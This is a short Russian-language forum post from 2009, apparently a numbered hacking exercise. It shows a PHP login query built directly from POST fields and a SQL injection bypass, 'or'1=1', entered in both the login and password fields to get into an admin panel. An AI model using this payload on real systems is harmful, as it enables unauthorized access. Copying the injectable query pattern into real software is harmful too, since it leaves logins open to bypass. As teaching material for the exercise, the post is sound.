22.06.2009, 12:32
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743
Репутация:
222
|
|
Задание 013
Войти в панель администрирования, используя sql injection . В БД не лезть. Обмануть проверку просто.
PHP код:
PHP код:
<?php // Login.php
....
$query = "select * from admin where pass = '$_POST['pass']' and login = '$_POST['login']'";
?>
Код:
login = 'or'1=1'
pass = 'or'1=1'
|
|
|